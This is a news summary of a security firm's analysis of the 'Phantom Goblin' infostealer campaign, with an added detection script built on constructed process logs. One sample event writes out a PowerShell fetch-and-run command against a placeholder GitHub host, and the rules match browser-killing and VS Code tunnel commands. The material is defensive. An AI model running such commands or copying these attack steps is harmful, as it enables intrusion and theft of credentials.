Cyble Research and Intelligence Labs (CRIL) has uncovered a sophisticated campaign dubbed ‘Phantom Goblin’, which uses social engineering methods to distribute information-stealing malware.
The attack begins with seemingly harmless RAR file attachments that contain malicious shortcut (LNK) files, disguised as legitimate PDF documents. Upon execution, these LNK files trigger a sequence of stealthy operations aimed at gathering confidential information from the victim’s system.
Once the LNK file is executed, it launches a PowerShell command that retrieves and runs a remote script from a GitHub repository. This script establishes persistence on the infected machine by creating registry entries and downloading multiple payload files, all designed to mimic legitimate applications, allowing the malware to remain undetected.
Cyble analysts have noted that Phantom Goblin primarily targets web browsers and developer tools. The malware is capable of forcefully terminating browser processes to extract sensitive data, such as cookies, login credentials, and browsing history. It also leverages Visual Studio Code (VS Code) tunnels to create and maintain unauthorized remote access to compromised systems.
The Phantom Goblin attack consists of three main executable components: updater.exe, vscode.exe, and browser.exe. The updater.exe component extracts cookies from major web browsers by first checking for running instances using tasklist commands, and then forcefully terminating them with taskkill.exe. Afterward, it archives the cookies into JSON files and bundles them into a ZIP archive, which is then transmitted to a Telegram bot for exfiltration.
The vscode.exe component downloads a legitimate copy of Visual Studio Code and establishes a covert tunnel that enables remote access to the compromised system.
Browser.exe targets at least 14 different web browsers, extracting a variety of sensitive information including stored passwords, cookies, browsing history, and wallet data. All the stolen information is archived into a ZIP file, named after the username, and exfiltrated through Telegram.
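A defender-side illustration of the chain described above, added here as example code and not taken from the Cyble report: three process-creation rules (explorer-spawned PowerShell fetching a remote script, forced taskkill of a browser, a VS Code tunnel) run over constructed log events, and a host where several stages co-occur is marked as a likely chain. The event fields, host names, browser list, GitHub URL and the VS Code `tunnel` command line are assumptions.

```python
import re
from collections import defaultdict

# Constructed Sysmon-style process-creation events modelled on the chain in the article.
# Host names, parents, the GitHub URL and the VS Code command line are made up, not report IoCs.
SAMPLE_EVENTS = [
    {"host": "ws01", "image": "powershell.exe", "parent": "explorer.exe",
     "cmd": 'powershell.exe -w hidden -c "iex (iwr https://raw.githubusercontent.com/EXAMPLE-ORG/EXAMPLE-REPO/main/x.ps1)"'},
    {"host": "ws01", "image": "tasklist.exe", "parent": "updater.exe",
     "cmd": 'tasklist /FI "IMAGENAME eq chrome.exe"'},  # enumeration step, too common to alert on alone
    {"host": "ws01", "image": "taskkill.exe", "parent": "updater.exe",
     "cmd": "taskkill.exe /F /IM chrome.exe"},
    {"host": "ws01", "image": "code.exe", "parent": "vscode.exe",
     "cmd": "code.exe tunnel"},  # assumed: tunnel started via the VS Code CLI 'tunnel' subcommand
    {"host": "ws02", "image": "powershell.exe", "parent": "explorer.exe",
     "cmd": "powershell.exe -c Get-Date"},  # benign control: no remote download
]

# Assumed browser image names; the article says "major web browsers" without naming them.
BROWSERS = ("chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "opera.exe")
REMOTE_PS = re.compile(r"(iwr|invoke-webrequest|downloadstring|iex|invoke-expression).*https?://", re.I)

def rule_remote_powershell(e):
    # A double-clicked LNK surfaces as explorer.exe -> powershell.exe pulling a script over HTTP(S)
    return (e["image"].lower() == "powershell.exe" and e["parent"].lower() == "explorer.exe"
            and REMOTE_PS.search(e["cmd"]) is not None)

def rule_browser_kill(e):
    # Forced taskkill of a browser: the stealer kills browsers before reading their cookie stores
    m = re.search(r"/IM\s+(\S+)", e["cmd"], re.I)
    return (e["image"].lower() == "taskkill.exe" and "/F" in e["cmd"].upper().split()
            and m is not None and m.group(1).lower() in BROWSERS)

def rule_vscode_tunnel(e):
    # VS Code CLI 'tunnel' subcommand, used by the campaign for unauthorized remote access
    return e["image"].lower() == "code.exe" and re.search(r"\btunnel\b", e["cmd"], re.I) is not None

RULES = {"remote_powershell": rule_remote_powershell,
         "browser_taskkill": rule_browser_kill,
         "vscode_tunnel": rule_vscode_tunnel}

def detect(events):
    """Map host -> sorted rule names; hosts hitting >= 2 distinct stages also get 'chain',
    since any single stage (e.g. a developer opening a tunnel) is weak evidence alone."""
    hits = defaultdict(set)
    for e in events:
        for name, rule in RULES.items():
            if rule(e):
                hits[e["host"]].add(name)
    return {h: sorted(r) + (["chain"] if len(r) >= 2 else []) for h, r in hits.items()}
```

Running `detect(SAMPLE_EVENTS)` flags only ws01, with all three stages plus the `chain` marker; the benign PowerShell on ws02 produces no finding.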
“This malware attack highlights the increasing sophistication of cyber threats that leverage social engineering and trusted tools for stealthy execution. By disguising itself within a RAR attachment, it deceives users into executing a malicious LNK file that initiates PowerShell-based attacks,” the report noted.